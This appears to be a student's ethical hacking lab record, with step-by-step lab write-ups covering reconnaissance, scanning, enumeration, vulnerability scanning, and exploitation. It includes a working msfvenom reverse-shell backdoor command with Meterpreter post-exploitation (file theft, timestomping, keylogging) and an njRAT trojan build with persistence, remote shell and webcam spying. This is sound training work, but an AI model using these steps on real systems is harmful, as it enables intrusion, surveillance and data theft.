EXPERIMENT Page Date

CONTENTS
NO number

Footprinting and Reconnaissance

1 Perform Footprinting Through Search Engines
1.1 Gather Information using Advanced Google Hacking
Techniques
1.2 Gather Information from Video Search Engines
1.3 Gather Information from FTP Search Engines
1.4 Gather Information from IoT Search Engines
Experiment 1 2 Perform Footprinting Through Web Services 4 20/11/2023
2.1 Find the Company’s Domains and Sub-domains using
Netcraft
2.2 Gather Personal Information using PeekYou Online
People Search Service
2.3 Gather an Email List using the Harvester
2.4 Gather Information using Deep and Dark Web
Searching
2.5 Determine Target OS Through Passive Footprinting

2 Scanning Networks
1 Perform Host Discovery
1.1 Perform Host Discovery using Nmap
Experiment 2 1.2 Perform Host Discovery using Angry IP Scanner
2 Perform Port and Service Discovery
11 1/12/2023
2.1 Perform Port and Service Discovery using MegaPing
2.2 Perform Port and Service Discovery using
NetScanTools Pro
Lab Module 3 : Enumeratio
1. Perfo 1 Perform NetBIOS Enumeration
1.1 Pe 1.1 Perform NetBIOS Enumeration using Windows
Command-Line Utilities
Experiment 31.2 P 1.2 Perform NetBIOS Enumeration using NetBIOS 17 7/12/2023
Enumerator
1.3 P 1.3 Perform NetBIOS Enumeration using an NSE Script
2. Perform SNMP Enumeration
2.1 Perform SNMP Enumeration using snmp-check
2.2 Perform SNMP Enumeration using SoftPerfect
Network Scanner
Vulnerability Analysis
1 Perform Vulnerability Research with Vulnerability
Scoring Systems and Databases
1.1 Perform Vulnerability Research in Common Weakness
Enumeration
(CWE)
Experiment 4 1.2 Perform Vulnerability Research in Common 21 15/12/2023
Vulnerabilities and
Exposures (CVE)
1.3 Perform Vulnerability Research in National
Vulnerability Database (NVD)
2 Perform Vulnerability Assessment using Various
Vulnerability Assessment Tools
2.1 Perform Vulnerability Analysis using OpenVAS

Page| 1
 2.2 Perform Vulnerability Scanning using Nessus
2.3 Perform Vulnerability Scanning using GFI LanGuard

System Hacking
1 Lab Exercise Name Gain Access to the System
1.1 Perform Active Online Attack to Crack the System’s
Password using Responder
1.2 Audit System Passwords using L0phtCrack
Experiment 5 26 21/12/2023
2 Perform Privilege Escalation to Gain Higher
Privileges
2.1 Escalate Privileges using Privilege Escalation Tools
and Exploit Client-Side Vulnerabilities
2.2 Hack a Windows Machine using Metasploit and
Perform Post-Exploitation using Meterpreter
Malware Threats
1 Gain Access to the Target System using Trojans
1. Gain Control over a Victim Machine using the
njRAT RAT Trojan
1.2 Hide a Trojan using SwayzCryptor and Make it
Undetectable to Various Anti-Virus Programs
Experiment 6 1.3 Create a Server using the ProRat Tool 36 11/1/2024
1.4 Create a Trojan Server using Theef RAT Trojan
2 Infect the Target System using a Virus
2.1 Create a Virus using the JPS Virus Maker Tool and
Infect the Target System
Perform Static Malware Analysis
3.1 Perform Online Malware Scanning using VirusTotal
3.2 Perform a Strings Search using BinText
Sniffing
1 Lab Exercise Name Perform Active Sniffing 1.1
Perform MAC Flooding using macof
1.2 Perform a DHCP Starvation Attack using Yersinia
1.3 Perform ARP Poisoning using arpspoof
Experiment 7 2 Perform Network Sniffing using Various Sniffing 43 24/1/2024
Tools
2.1 Perform Password Sniffing using Wireshark
2.2 Analyze a Network using the Capsa Network Analyzer
2.3 Analyze a Network using the Omnipeek Network
Protocol Analyzer
Social Engineering
1 Perform Social Engineering using Various
Techniques
1.1 Sniff Users’ Credentials using the Social-Engineer
Toolkit (SET)
1.2 Perform Phishing using ShellPhish
Experiment 8 52 29/1/2024
2 Detect a Phishing Attack
2.1 Detect Phishing using Netcraft 2.2 Detect Phishing
using PhishTank
3 Audit Organization's Security for Phishing Attacks
3.1 Audit Organization's Security for Phishing Attacks
using OhPhish

Page| 2
 1 Perform DoS and DDoS Attacks using Various
Techniques
1.1 Perform a DoS Attack (SYN Flooding) on a Target
Host using Metasploit
1.2 Perform a DoS Attack on a Target Host using hping3
Experiment 9 55 30/1/2024
1.3 Perform a DDoS Attack using HOIC 1.4 Perform a
DDoS Attack using LOIC
Detect and Protect Against DoS and DDoS Attacks
2.1 Detect and Protect against DDoS Attack using Anti
DDoS Guardian

Session Hijacking
1 Lab Exercise Name Perform Session Hijacking
1.1 Hijack a Session using Zed Attack Proxy (ZAP)
Experiment 10 68 22/1/2024
1.2 Intercept HTTP Traffic using bettercap
2 Detect Session Hijacking2.1 Detect Session Hijacking
using Wireshark

Experiment 11 Evading IDS, Firewalls, and Honeypots

Experiment 12 Hacking Web Servers

Faculty : Dr.Shyam R.

(Signature)

Page| 3
Experiment 1: Footprin/ng and Reconnaissance
1 Perform Footprin/ng Through Search Engines

Task 1: Gather Information using Advanced Google Hacking

Techniques

1. By default Windows 10 machine selected, click Ctrl+Alt+Delete .

2. By default, Admin user profile is selected, click Pa$$w0rd to paste the password in the
Password field and press Enter to login.

Alternatively, you can also click Pa$$w0rd under Windows 10 machine thumbnail in
the Resources pane or Click Type Text | Type Password button under Commands
(thunder icon) menu.
If Welcome to Windows wizard appears, click Continue and in Sign in with
Microsoft wizard, click Cancel.
Networks screen appears, click Yes to allow your PC to be discoverable by other PCs and
devices on the network.

3. Launch any browser, in this lab we are using Mozilla Firefox. In the address bar of the
browser place your mouse cursor and click https://www.google.com and press Enter.
o If the Default Browser pop-up window appears, uncheck the Always perform this
check when starting Firefox checkbox and click the Not now button.
o If a New in Firefox: Content Blocking pop-up window appears, follow the step and
click Got it to finish viewing the information.

4. Once the Google search engine appears, you should see a search bar.

If any pop-up window appears at the top-right corner, click No, thanks.

5. Type intitle:login site:eccouncil.org and press Enter. This search command

uses intitle and site Google advanced operators, which restrict results to pages on
the eccouncil.org website that contain the login pages. An example is shown in the
screenshot below.

Here, this Advanced Google Search operator can help attackers and pen testers to extract
login pages of the target organization's website. Attackers can subject login pages to
various attacks such as credential bruteforcing, injection attacks and other web application
attacks. Similarly, assessing the login pages against various attacks is crucial for penetration
testing.

Page| 4
6. Now, click back icon present on the top-left corner of the browser window to navigate
back to https://www.google.com.

7. In the search bar, type the command EC-Council filetype:pdf and press Enter to search
your results based on the file extension.

Here, the file type pdf is searched for the target organization EC-Council. The result might
differ when you perform this task.
The PDF and other documents from a target website may provide sensitive information
about the target's products and services. They may help attackers to determine an attack

Page| 5
 vector to exploit the target. Pen testers also look for these files to assess the target
organisation's security posture.

8. Now, click on any link from the results (here, first link) to view the pdf file.

9. The page appears displaying the PDF file, as shown in the screenshot.

Page| 6
10. Apart from the aforementioned advanced Google operators, you can also use the
following to perform an advanced search to gather more information about the target
organization from publicly available sources.
o cache: This operator allows you to view cached version of the web page.
[cache:www.eccouncil.org]- Query returns the cached version of the website
www.eccouncil.org
o allinurl: This operator restricts results to pages containing all the query terms
specified in the URL. [allinurl: EC-Council career]—Query returns only pages
containing the words “EC-Council” and “career” in the URL
o inurl: This operator restricts the results to pages containing the word specified in the
URL [inurl: copy site:www.eccouncil.org]—Query returns only pages in EC-Council
site in which the URL has the word “copy”
o allintitle: This operator restricts results to pages containing all the query terms
specified in the title. [allintitle: detect malware]—Query returns only pages
containing the words “detect” and “malware” in the title
o inanchor: This operator restricts results to pages containing the query terms
specified in the anchor text on links to the page. [Anti-virus inanchor:Norton]—
Query returns only pages with anchor text on links to the pages containing the word
“Norton” and the page containing the word “Anti-virus”
o allinanchor: This operator restricts results to pages containing all query terms
specified in the anchor text on links to the page. [allinanchor: best cloud service
provider]—Query returns only pages in which the anchor text on links to the pages
contain the words “best,” “cloud,” “service,” and “provider”
o link: This operator searches websites or pages that contain links to the specified
website or page. [link:www.eccouncil.org]—Finds pages that point to EC-Council’s
home page
o related: This operator displays websites that are similar or related to the URL
specified. [related:www.eccouncil.org]—Query provides the Google search engine
results page with websites similar to eccouncil.org

Page| 7
 o info: This operator finds information for the specified web page.
[info:eccouncil.org]—Query provides information about the www.eccouncil.org
home page
o location: This operator finds information for a specific location. [location: EC-
Council]—Query give you results based around the term EC-Council
11. This concludes the demonstration of gathering information using advanced Google
hacking techniques. You can conduct a series of queries on your own by using these
advanced Google operators and gather the relevant information about the target
organization.
12. Close all open windows and document all the acquired information.

2 Perform Footprin/ng Through Web Engines

Task 3: Gather an Email List using theHarvester

1. To launch Parrot Security machine, click Parrot Security.

2. In the login page, the attacker username will be selected by default. Enter password
as toor in the Password field and press Enter to log in to the machine.

If a Parrot Updater pop-up appears at the top-right corner of Desktop, ignore and close it.

If a Question pop-up window appears asking you to update the machine, click No to close
the window.

Page| 8
3. Click the MATE Terminal icon at the top of the Desktop window to open a Terminal
window.

4. A Parrot Terminal window appears. In the terminal window, type sudo su and
press Enter to run the programs as a root user.

5. In the [sudo] password for attacker field, type toor as a password and press Enter.

The password that you type will not be visible.

6. Now, type cd and press Enter to jump to the root directory.

7. In the terminal window, type theHarvester -d microsoft.com -l 200 -b baidu and

press Enter.

In this command, -d specifies the domain or company name to search, -l specifies the
number of results to be retrieved, and -b specifies the data source.

8. theHarvester starts extracting the details and displays them on the screen. You can see
the email IDs related to the target company and target company hosts obtained from the
Baidu source, as shown in the screenshot.

Page| 9
9. This concludes the demonstration of gathering an email list using theHarvester.

10. Close all open windows and document all the acquired information.

Page| 10
Experiment 2: Scanning Networks
1) Perform Host Discovery

Task 1: Perform Host Discovery using Nmap

1. Navigate to the Desktop and double-click Nmap - Zenmap GUI shortcut.

2. The Nmap - Zenmap GUI appears; in the Command field, type the command nmap -
sn -PR [Target IP Address] (here, the target IP address is 10.10.10.16) and click Scan.

-sn: disables port scan and -PR: performs ARP ping scan.

3. The scan results appear, indicating that the target Host is up, as shown in the
screenshot.

In this lab, we are targeting the Windows Server 2016 (10.10.10.16) machine.
The ARP ping scan probes ARP request to target host; an ARP response means that the host
is active.

4. In the Command field, type nmap -sn -PU [Target IP Address], (here, the target IP
address is 10.10.10.16) and click Scan. The scan results appear, indicating the target Host is
up, as shown in the screenshot.

-PU: performs the UDP ping scan.

The UDP ping scan sends UDP packets to the target host; a UDP response means that the
host is active. If the target host is offline or unreachable, various error messages such as
“host/network unreachable” or “TTL exceeded” could be returned.

Page| 11
5. Now, we will perform the ICMP ECHO ping scan. In the Command field, type nmap -sn
-PE [Target IP Address], (here, the target IP address is 10.10.10.16) and click Scan. The
scan results appear, indicating that the target Host is up, as shown in the screenshot.

-PE: performs the ICMP ECHO ping scan.

The ICMP ECHO ping scan involves sending ICMP ECHO requests to a host. If the target host
is alive, it will return an ICMP ECHO reply. This scan is useful for locating active devices or
determining if the ICMP is passing through a firewall.

6. Now, we will perform an ICMP ECHO ping sweep to discover live hosts from a range of
target IP addresses. In the Command field, type nmap -sn -PE [Target Range of IP
Addresses] (here, the target range of IP addresses is 10.10.10.11-20) and click Scan. The
scan results appear, indicating the target Host is up, as shown in the screenshot.

Page| 12
7. Apart from the aforementioned network scanning techniques, you can also use the
following scanning techniques to perform a host discovery on a target network.
o ICMP Timestamp and Address Mask Ping Scan: These techniques are alternatives
for the traditional ICMP ECHO ping scan, which are used to determine whether the
target host is live specifically when administrators block the ICMP ECHO pings.

Example –

ICMP timestamp ping scan

# nmap -sn -PP [target IP address]

ICMP address mask ping scan

# nmap -sn -PM [target IP address]

o TCP SYN Ping Scan: This technique sends empty TCP SYN packets to the target
host, ACK response means that the host is active.

# nmap -sn -PS [target IP address]

o TCP ACK Ping Scan: This technique sends empty TCP ACK packets to the target
host; an RST response means that the host is active.

# nmap -sn -PA [target IP address]

o IP Protocol Ping Scan: This technique sends different probe packets of different IP
protocols to the target host, any response from any probe indicates that a host is
active.

# nmap -sn -PO [target IP address]

8. This concludes the demonstration of discovering the target host(s) in the target network
using various host discovery techniques.
9. Close all open windows and document all the acquired information.

Page| 13
 2) Perform Port and Service Discovery
Task 2: Perform Port and Service Discovery using NetScanTools Pro

1. The Reminder window appears; if you are using a demo version of NetScanTools Pro,
click the Start the DEMO button.

2. A DEMO Version pop-up appears; click the Start NetScanTools Pro Demo… button.

Page| 14
3. The NetScanTools Pro main window appears, as shown in the screenshot.

4. In the left-hand pane, under the Manual Tools (all) section, scroll down and click
the Ping Scanner option, as shown in the screenshot.
5. A dialog box opens explaining the Ping Scanner tool; click OK.

6. Ensure that Use Default System DNS is selected. Enter the range of IP addresses into
the Start IP and End IP fields (here, 10.10.10.5 - 10.10.10.20); then, click Start.

7. A Ping Scanner notice pop-up appears; click I Accept.

8. After the completion of the scan, a scan result appears in the web browser (here, Google
Chrome).

9. Close the browser and switch to the NetScanTools Pro window.

10. Now, click the Port Scanner option from the left-hand pane under the Manual Tools
(all) section.

If a dialog box appears explaining the Port Scanner tool, click OK.

11. In the Target Hostname or IP Address field, enter the IP address of the target
(here, 10.10.10.16). Ensure that TCP Full Connect is selected, and then click the Scan
Range of Ports button.

Page| 15
12. A Port Scanner notice pop-up appears; click I Accept.
13. A result appears displaying the active ports and their descriptions, as shown in the
screenshot.

By performing the above scans, you will be able to obtain a list of active machines in the
network, their respective IP addresses and hostnames, and a list of all the open ports and
services that will allow you to choose a target host in order to enter into its network and
perform malicious activities such as ARP poisoning, sniffing, etc.

14. This concludes the demonstration of discovering open ports and services running on the
target IP address using NetScanTools Pro.

Page| 16
Experiment 3: Enumera/on
1) Perform NetBIOS Enumera/on

Task 1: Perform NetBIOS Enumeration using Windows Command-

Line Utilities

1. Open a Command Prompt window.

2. Type nbtstat -a [IP address of the remote machine] (in this example, the target IP
address is 10.10.10.10) and press Enter.

In this command, -a displays the NetBIOS name table of a remote computer.

3. The result appears, displaying the NetBIOS name table of a remote computer (in this
case, the WINDOWS10 machine), as shown in the screenshot.

4. In the same Command Prompt window, type nbtstat -c and press Enter.

In this command, -c lists the contents of the NetBIOS name cache of the remote computer.

5. The result appears, displaying the contents of the NetBIOS name cache, the table of
NetBIOS names, and their resolved IP addresses.

It is possible to extract this information without creating a null session (an unauthenticated
session).

Page| 17
6. Now, type net use and press Enter. The output displays information about the target
such as connection status, shared folder/drive and network information, as shown in the
screenshot.

7. This concludes the demonstration of performing NetBIOS enumeration using Windows

command-line utilities such as Nbtstat and Net use.

Close all open windows and document all the acquired information.

Page| 18
2) Perform SNMP Enumera/on
Perform SNMP Enumera/on using snmp-check
15. Enter the following command in the terminal nmap -sU -p 161 <target IP address>

16.
17. Port 161 seems to be open/filtered and used by SNMP service.
18. Now to obtain information about the target system, type the following
command and press Enter snmp-check <target IP address>
19. The snmp-check command enumerates the target machine and lists
information such as system information, user accounts, Network information,
network IP, and listening ports.

20.
21. Scroll down to view detailed information regarding the target network under
the following sections: networking IP, routing information and listening ports.

Page| 19
Page| 20
Experiment - 4
1) Perform Vulnerability Research in Common
Vulnerabili/es and Exposures (CVE):

1. In Windows 10 machine, launch any browser (here, Mozilla Firefox). In the address bar
of the browser place your mouse cursor and click https://cve.mitre.org/ and press Enter
2. CVE website appears. In the right pane, under the Newest CVE Entries section, recently
discovered vulnerabilities are displayed.
The results might differ in your lab environment.

3. You can copy the name of any vulnerability under the Newest CVE Entries section and
search on CVE to view detailed information on it. (here, we are selecting the
vulnerability CVE-2020-13910)
4. Now, click on the Search CVE List tab. Under Search CVE List section, type the
vulnerability name (here, CVE-2020-4051) in the search bar, and click Submit.
5. Search Results page appears, displaying the information regarding the searched
vulnerability. You can click the vulnerability link to view further detailed information
regarding the vulnerability.

6. Similarly, in the Search CVE List section, you can search for a service-related
vulnerability by typing the service name (here, SMB) and click Submit
7. Search Results page appears, displaying a list of vulnerabilities in the target service
(SMB) along with their description, as shown in the screenshot
8. Further, you can click on CVE-ID of any vulnerability to view its detailed information.
Here, we will click on the first CVE-ID link.
9. Detailed information regarding the vulnerability is displayed such as
its Description, References, and Date Entry Created. Further, you can click on links under
the References section to view more information on the vulnerability.

Page| 21
10. Likewise, you can search for other target services for the underlying vulnerabilities in
the Search CVE List section.
11. This concludes the demonstration of checking vulnerabilities in the Common
Vulnerabilities and Exposures (CVE).
12. Close all open windows and document all the acquired information.

4.2) Perform Vulnerability Analysis using OpenVAS

Perform Vulnerability Analysis using OpenVAS
1. Click on Parrot Security to switch to the Parrot Security machine.
2. In the login page, the attacker username will be selected by default. Enter password
as toor in the Password field and press Enter to log in to the machine.
3. Click Applications at the top of the Desktop window and navigate to Pentesting --
> Vulnerability Analysis --> Openvas - Greenbone --> Start to launch OpenVAS tool.
4. A terminal window appears, in the [sudo] password for attacker field, type toor as a
password and press Enter. OpenVAS initializes.
5. After the tool initializes, click Firefox icon from the top-section of the Desktop.
6. The Firefox browser appears, in the address bar, type https://127.0.0.1:9392 and
press Enter.
7. OpenVAS login page appears, log in
with Username and Password as admin and password and click the Login button.

Page| 22
8. OpenVAS Dashboards appears, as shown in the screenshot.
9. Navigate to Scans --> Tasks from the Menu bar.
10. Hover over wand icon and click the Task Wizard option.
11. The Task Wizard window appears; enter the target IP address in the IP address or
hostname field (here, the target system is Windows Server 2016 [10.10.10.16]) and click
the Start Scan button.
12. The task appears under the Tasks section; OpenVAS starts scanning the target IP
address.
13. Wait for the Status to change from Requested to Done. Once it is completed, click
the Done button under the Status column to view the vulnerabilities found in the target
system.
If you are logged out of the session then login again using credentials admin/password.

14. Report: Information appears, click Results tab to view the discovered vulnerabilities
along with their severity and port numbers on which they are running.
15. Click on any vulnerability under the Vulnerability column (here, Apache HTTP Server
2.4.20 - 2.4.39 Multiple Vulnerabilities (Windows) to view its detailed information.
16. Detailed information regarding selected vulnerability appears, as shown in the
screenshot.

17. Similarly, you can click other discovered vulnerabilities under

the Report: Results section to view detailed information regarding the vulnerabilities in the
target system.

Page| 23
18. Next, go through the findings, including all high or critical vulnerabilities. Manually use
your skills to verify the vulnerability. The challenge with vulnerability scanners is that they are
quite limited; they work well for an internal or white box test only if the credentials are
known. We will explore that now: return to your OpenVAS tool, and set up for the same scan
again; but this time, turn your firewall ON in the Windows Server 2016 machine.
19. Now, we will enable Windows Firewall in the target system and scan it for
vulnerabilities.
20. Click on Windows Server 2016 to switch to the Windows Server 2016 machine and
click Ctrl+Alt+Delete to activate it, by default, Administrator user profile is selected,
click Pa$$w0rd to paste the password in the Password field and press Enter to login.
21. Navigate to Control Panel --> System and Security --> Windows Firewall --> Turn
Windows Firewall on or off, enable Windows Firewall, and click OK.

ada

22. click on Parrot Security to switch to Parrot Security machine and perform Steps# 9-
11 to create another task for scanning the target system.
23. A newly created task appears under the Tasks section and starts scanning the target
system for vulnerabilities.
24. After the completion of the scan, click the Done button under the Status column.
25. Report: Information appears, click Results tab to view the discovered vulnerabilities
along with their severity and port numbers on which they are running.

Page| 24
26. The scan results for the target machine before and after the Windows Firewall was
enabled are the same, thereby indicating that the target system is vulnerable to attack even
if the Firewall is enabled.
27. This concludes the demonstration performing vulnerabilities analysis using OpenVAS.
28. Close all open windows and document all the acquired information.
29. Click on Windows Server 2016 to switch to the Windows Server 2016 machine and
click Ctrl+Alt+Delete to activate it, by default, Administrator user profile is selected,
click Pa$$w0rd to paste the password in the Password field and press Enter to login.

30. Navigate to Control Panel --> System and Security --> Windows Firewall --> Turn
Windows Firewall on or off, disable Windows Firewall, and click OK.

Page| 25
Experiment – 5
1) Audit System Passwords using L0phtCrack
1. Obtain Password Hashes:

- L0phtCrack requires password hashes to initiate the cracking process.

2. Remote Access for Hash Retrieval:

- Network administrators can use L0phtCrack to remotely access computers on the network
and retrieve password hashes.

3. Manual or Scheduled Audits:

- L0phtCrack audits can be initiated either manually or scheduled at predefined intervals.

4. Grouped Hash Attacks:

- Once obtained, password hashes are grouped and subjected to various attacks.

5. Dictionary Attack:

- L0phtCrack employs a dictionary attack to crack passwords using a predefined set of words.

6. Hybrid Attack:

- The software utilizes a hybrid attack combining different techniques to crack passwords.

7. Rainbow Tables:

- A pre-computed assault using rainbow tables is employed in the cracking process.

8. Brute-Force Attack:

- After confirming the uniqueness of username and password, L0phtCrack uses a brute-force
attack to crack passwords.

Page| 26
5.2) Hack a Windows Machine using Metasploit and Perform Post-
Exploitation using Meterprete

1. Create a text file named secret.txt; write something in this file and save it in the
location C:\Users\Admin\Downloads.
In this lab, the secret.txt file contains the text “My credit card account number is
123456789.”

2. Click Parrot Security to switch to the Parrot Security machine and launch
a Terminal window.
3. A Parrot Terminal window appears. In the terminal window, type sudo su and
press Enter to run the programs as a root user.
4. In the [sudo] password for attacker field, type toor as a password and press Enter.
The password that you type will not be visible.

5. Now, type cd and press Enter to jump to the root directory.

6. Type the command msfvenom -p windows/meterpreter/reverse_tcp --platform
windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.10.13 -f exe >
Desktop/Backdoor.exe and press Enter.
7.
8. Now, you need to share Backdoor.exe with the target machine (in this lab, Windows
10).
9. In the previous lab, we created a directory or shared folder (share) at the location
(/var/www/html) and with the required access permission. We will use the same directory
or shared folder (share) to share Backdoor.exe with the victim machine.
10. Type cp /root/Desktop/Backdoor.exe /var/www/html/share/ and press Enter to
copy the file to the share folder.
11. To share the file, you need to start the Apache server. Type the command service
apache2 start and press Enter.

Page| 27
12. Now, type the command msfconsole and press Enter to launch Metasploit.
13. Type use exploit/multi/handler and press Enter to handle exploits launched outside of
the framework.
14. Now, issue the following commands in msfconsole:
o Type set payload windows/meterpreter/reverse_tcp and press Enter
o Type set LHOST 10.10.10.13 and press Enter
o Type show options and press Enter; this lets you know the listening port
15. To start the handler, type exploit -j -z and press Enter.
16. Click Windows 10 to switch to the Windows 10 machine.
17. Open any web browser (here, Mozilla Firefox). In the address bar place your mouse
cursor, click http://10.10.10.13/share and press Enter. As soon as you press enter, it will display
the shared folder contents, as shown in the screenshot.
18. Click Backdoor.exe to download the file.

19. Once you click on the Backdoor.exe file, the Opening Backdoor.exe pop-up appears;
select Save File.
Make sure that both the Backdoor.exe and secret.txt files are stored in the same directory
(here, Downloads).

20. Double-click the Backdoor.exe file. The Open File - Security Warning window appears;
click Run.

Page| 28
21. Leave the Windows 10 machine running and click Parrot Security to switch to
the Parrot Security machine.
22. The Meterpreter session has successfully been opened, as shown in the screenshot.
23. Type sessions -i 1 and press Enter (here, 1 specifies the ID number of the session).
The Meterpreter shell is launched, as shown in the screenshot.
24. Type sysinfo and press Enter. Issuing this command displays target machine
information such as computer name, OS, and domain.

Page| 29
25. Type ipconfig and press Enter. This displays the victim machine’s IP address, MAC
address, and other information.

26. Type getuid and press Enter to display that the Meterpreter session is running as an
administrator on the host.
27. Type pwd and press Enter to view the current working directory on the victim machine.

Page| 30
28. Type ls and press Enter to list the files in the current working directory.
29. To read the contents of a text file, type cat [filename.txt] (here, secret.txt) and
press Enter.
30. Now, we will change the MACE attributes of the secret.exe file.

To view the mace attributes of secret.txt, type timestomp secret.txt -v and

press Enter. This displays the created time, accessed time, modified time, and entry modified
time, as shown in the screenshot.

To change the MACE value, type timestomp secret.txt -m “02/11/2018 08:10:03” and
press Enter. This command changes the Modified value of the secret.txt file.
-m: specifies the modified value.

Page| 31
31. You can see the changed Modified value by issuing the command timestomp
secret.txt -v.
32. Similarly, you can change the Accessed (-a), Created (-c), and Entry Modified (-e)
values of a particular file.
33. The cd command changes the present working directory. As you know, the current
working directory is C:\Users\Admin\Downloads. Type cd C:/ and press Enter to change
the current remote directory to C.
34. Now, type pwd and press Enter and observe that the current remote directory has
changed to the C drive.

Page| 32
35. Here, the download command downloads a file from the remote machine to the host
machine. To do so, type download [Filename.extension] and press Enter.
36. The file will be downloaded to the Home or root folder of the host machine (here,
the Parrot Security machine).
37. You can also use a search command that helps you to locate files on the target machine.
This type of command is capable of searching through the whole system or can be limited
to specific folders.
38. Type search -f [Filename.extension] (here, pagefile.sys) and press Enter. This displays
the location of the searched file.
39. Now that you have successfully exploited the system, you can perform post-exploitation
maneuvers such as key-logging. Type keyscan_start and press Enter to start capturing all
keyboard input from the target system.

Page| 33
40. Now, click Windows 10 to switch to the Windows 10 machine, create a text file, and
start typing something.
41. Click Parrot Security to switch to the Parrot Security machine, type keyscan_dump, and
press Enter. This dumps all captured keystrokes.

42. Type idletime and press Enter to display the amount of time for which the user has
been idle on the remote system.

43. You can also type shutdown and press Enter to shut down the victim machine after
performing post-exploitation.
44. Observe that the Meterpreter session also dies as soon as you shut down the victim
machine.

Page| 34
45. Click Windows 10 to switch to the Windows 10 machine (victim machine).
46. You can observe that the machine has been turned off.
47. This concludes the demonstration of how to hack Windows machines using Metasploit
and perform post-exploitation using Meterpreter.
48.

Page| 35
Experiment – 6
6.1) Gain Control over a Vic/m Machine using the njRAT RAT
Trojan

1. Navigate to D:\CEH-Tools\CEHv11 Module 07 Malware Threats\Trojans

Types\Remote Access Trojans (RAT)\njRAT and double-click njRAT v0.7d.exe.
2. The njRAT GUI appears along with an njRAT pop-up, where you need to specify the
port you want to use to interact with the victim machine. Enter the port number and
click Start.
3. In this lab, the default port number 5552 has been chosen.

4. The njRAT GUI appears; click the Builder link located in the lower-left corner of the GUI
to configure the exploit details.

5. The Builder dialog-box appears; enter the IP address of the Windows 10 (attacker
machine) machine in the Host field, check the option Registy StarUp, leave the other
settings to default, and click Build.
6. The Save As window appears; specify a location to store the server, rename it, and
click Save.
7. In this lab, the destination location chosen is Desktop, and the file is named Test.exe.

Page| 36
8. Once the server is created, the DONE! pop-up appears; click OK.
9. Now, use any technique to send this server to the intended target through email or any
other source (in real-time, attackers send this server to the victim)
10. Click Windows Server 2016 to switch to the Windows Server 2016 machine.
Click Ctrl+Alt+Delete to activate the machine, by default, CEH\Administrator account is
selected, click Pa$$w0rd to enter the password and press Enter.
11. Navigate to the shared network location (CEH-Tools), and then Copy and Paste the
executable file (Test.exe) onto the Desktop of Windows Server 2016.
12. Here, you are acting both as an attacker who logs into the Windows 10 machine to
create a malicious server, and as a victim who logs into the Windows Server 2016 machine
and downloads the server.
13. Double-click the server (Test.exe) to run this malicious executable.
14. Click Windows 10 to switch back to the Windows 10 machine. As soon as the victim
(here, you) double-clicks the server, the executable starts running and the njRAT client
(njRAT GUI) running in Windows 10 establishes a persistent connection with the victim
machine, as shown in the screenshot.

15. Unless the attacker working on the Windows 10 machine disconnects the server on
their own, the victim machine remains under their control.
16. The GUI displays the machine’s basic details such as the IP address, User name, and Type
of Operating system.
17. Right-click on the detected victim name and click Manager.
18. The manager window appears with File Manager selected by default.
19. Double-click any directory in the left pane (here, ProgramData); all its associated files
and directories are displayed in the right pane. You can right-click a selected directory and
manipulate it using the contextual options.
20. Click on Process Manager. You will be redirected to the Process Manager, where you
can right-click on a selected process and perform actions such as Kill, Delete, and Restart.

Page| 37
21. Click on Connections, select a specific connection, right-click on it, and click Kill
Connection. This kills the connection between two machines communicating through a
particular port.
22. Click on Registry, choose a registry directory from the left pane, and right-click on its
associated registry files.
23. A few options appear for the files; you can use these to manipulate them.
24. Click Remote Shell. This launches a remote command prompt for the victim machine
(Windows Server 2016).
25. Type the command ipconfig/all and press Enter.
26. This displays all interfaces related to the victim machine, as shown in the screenshot.

27. Similarly, you can issue all other commands that can be executed in the command
prompt of the victim machine.
28. In the same way, click Services. You will be able to view all services running on the
victim machine. In this section, you can use options to start, pause, or stop a service.
29. Close the Manager window.
30. Now, right-click on the victim name, click Run File, and choose an option from the
drop-down list to execute scripts or files remotely from the attacker machine
31. Right-click on the victim name, and then select Remote Desktop.

32. This launches a remote desktop connection without the victim’s awareness.

Page| 38
33. A Remote Desktop window appears; hover the mouse cursor to the top-center area of
the window. A down arrow appears; click it.
34. A remote desktop control panel appears; check the Mouse option.
35. Now, you will be able to remotely interact with the victim machine using the mouse.
If you want to create any files or write any scripts on the victim machine, you need to check
the Keyboard option.

36. On completing the task, close the Remote Desktop window.

37. In the same way, right-click on the victim name, and select Remote
Cam and Microphone to spy on them and track voice conversations.

38. Click Windows Server 2016 to switch to the Windows Server 2016 machine. Assume
that you are a legitimate user and perform a few activities such as logging into any website
or typing some text in text documents.
39. Click Windows 10 to switch back to the Windows 10 machine, right-click on the victim
name, and click Keylogger.
40. The Keylogger window appears; wait for the window to load.
41. The window displays all the keystrokes performed by the victim on the Windows Server
2016 machine, as shown in the screensho

42. Close the Keylogger window.

43. Right-click on the victim name, and click Open Chat.
44. A Chat pop-up appears; enter a nickname (here, Hacker) and click OK.

Page| 39
45. A chat box appears; type a message, and then click Send.
46. In real-time, as soon as the attacker sends the message, a pop-up appears on the
victim’s screen (Windows Server 2016), as demonstrated in the screenshot.
47. Click Windows Server 2016 to switch to the Windows Server 2016 machine, you can
observe the message from the hacker appears on the screen.

48. Seeing this, the victim becomes alert and attempts to close the chatbox. Irrespective of
what the victim does, the chatbox remains for open as long as the attacker uses it.
49. Surprised by the behavior, the victim (you) attempts to break the connection by
restarting the machine. As soon as this happens, njRAT loses its connection with Windows
Server 2016, as the machine is shut down in the process of restarting.
50. Click Windows 10 to switch back to the attacker machine (Windows 10); you can see
that the connection with the victim machine is lost.

51. However, as soon as the victim logs in to their machine, the njRAT client automatically
establishes a connection with the victim, as shown in the screenshot.
52. Click Windows Server 2016 to switch to the victim machine (Windows Server 2016).
Click Ctrl+Alt+Delete to activate the machine, by default, CEH\Administrator account is
selected, click Pa$$w0rd to enter the password and press Enter.
53. Click Windows 10 to switch back to the attacker machine (Windows 10); you can see
that the connection has been re-established with the victim machine.

Page| 40
54. The attacker, as usual, makes use of the connection to access the victim machine
remotely and perform malicious activity.
55. On completion of this lab, click Windows Server 2016 to switch to the Windows Server
2016 machine, launch Task Manager, look for the server.exe (32 bit) process, and
click End task.
56. This concludes the demonstration of how to create a Trojan using njRAT Trojan to gain
control over a victim machine.

6.2) Perform Online Malware Scanning using VirusTotal:

1. Open any web browser (here, Google Chrome).In the address bar of the browser place your
mouse cursor and click https://www.virustotal.com and press Enter.
2. The VirusTotal main analysis site appears; click Choose file to upload a virus file.

3. The Open window appears; navigate to D:\CEH-Tools\CEHv11 Module 07 Malware

Threats\Viruses, select tini.exe, and click Open.
